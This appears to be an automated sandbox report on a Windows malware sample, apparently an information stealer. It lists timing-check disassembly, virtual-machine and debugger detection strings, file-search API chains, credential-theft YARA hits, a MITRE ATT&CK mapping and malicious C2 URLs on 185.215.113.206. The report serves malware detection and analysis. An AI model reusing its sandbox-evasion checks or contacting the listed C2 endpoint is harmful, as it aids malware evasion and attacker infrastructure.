                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85479 second address: B8548D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F0AD8C6A9B8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8548D second address: B854CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0AD95F882Ah 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F0AD95F8837h 0x00000012 jmp 00007F0AD95F8834h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B854CB second address: B854D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85BDF second address: B85BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85BE3 second address: B85BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85BE9 second address: B85BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85BEF second address: B85BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85BF3 second address: B85C2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0AD95F8834h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0AD95F8830h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85C2E second address: B85C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AB59 second address: B8AB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0AD95F8833h 0x0000000c jp 00007F0AD95F8826h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E9D3 second address: B8EA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0AD8C6A9C9h 0x00000008 jns 00007F0AD8C6A9B6h 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0AD8C6A9BAh 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE292C second address: AE2932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2932 second address: AE2937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2937 second address: AE296B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0AD95F8832h 0x00000008 jmp 00007F0AD95F8839h 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E3DE second address: B8E3F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9BFh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E3F4 second address: B8E403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F0AD95F8826h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E403 second address: B8E444 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F0AD8C6A9C9h 0x00000018 jmp 00007F0AD8C6A9C4h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E444 second address: B8E44A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E44A second address: B8E44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9238B second address: B923A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jp 00007F0AD95F8826h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C830 second address: B9C834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C834 second address: B9C858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0AD95F882Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C858 second address: B9C85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C3DF second address: B9C3E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C3E5 second address: B9C3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C3EB second address: B9C3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9FE85 second address: B9FE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9FE90 second address: B9FEC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0AD95F8834h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F9F7 second address: B9F9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB1525 second address: BB152B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB398E second address: BB3992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB3992 second address: BB3998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8874 second address: BB8892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F0AD8C6A9B6h 0x00000009 jmp 00007F0AD8C6A9C1h 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8892 second address: BB8898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB89CE second address: BB89D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8CAD second address: BB8CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD95F8826h 0x0000000a jmp 00007F0AD95F8835h 0x0000000f jmp 00007F0AD95F882Bh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8CDE second address: BB8CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8FDA second address: BB8FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9152 second address: BB9156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB92A5 second address: BB92D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0AD95F8844h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB92D1 second address: BB9305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C9h 0x00000007 jmp 00007F0AD8C6A9C2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9305 second address: BB930F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB930F second address: BB9314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC367E second address: BC3688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0AD95F8826h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3688 second address: BC368C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC368C second address: BC36CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8835h 0x0000000b pushad 0x0000000c jne 00007F0AD95F8826h 0x00000012 pushad 0x00000013 popad 0x00000014 jbe 00007F0AD95F8826h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 jmp 00007F0AD95F882Ah 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC36CA second address: BC36CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC36CE second address: BC36D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC36D4 second address: BC36E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F0AD8C6A9B6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC36E4 second address: BC36E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA48B second address: BCA492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC190 second address: BCC19C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 96DBD1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 96DB17 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B17944 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 96DAF5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B973C3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision graph_0-39178
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_006940F0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0068E530
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00681710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00681710
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_006947C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0068F7B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00694B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00694B60
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00693B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00693B00
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0068DB80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0068BE40
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0068EE20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0068DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0068DF10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00681160 GetSystemInfo,ExitProcess, 0_2_00681160
                Source: file.exe, file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2132664415.0000000001482000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2132664415.0000000001452000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
                Source: file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-37993
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-38009
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-37990
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-38005
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-38045
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-37879
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00684610 VirtualProtect ?,00000004,00000100,00000000 0_2_00684610
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00699BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00699BB0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00699AA0 mov eax, dword ptr fs:[00000030h] 0_2_00699AA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00697690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA, 0_2_00697690
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00699790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00699790
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006998E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle, 0_2_006998E0
                Source: file.exe, file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: &CProgram Manager
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C75A8 cpuid 0_2_006C75A8
                Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00697D20
                Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00697B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00697B10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006979E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_006979E0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00697BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00697BC0

                Stealing of Sensitive Information

                Source: Yara match File source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match File source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix (techniques listed per tactic; numeric prefixes are kept as given on the page)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: 2 Command and Scripting Interpreter; 12 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 334 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                s-part-0015.t-0009.t-msedge.net | 13.107.246.43 | true | false | | unknown

                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php | true | | unknown
                http://185.215.113.206/ | true | | unknown

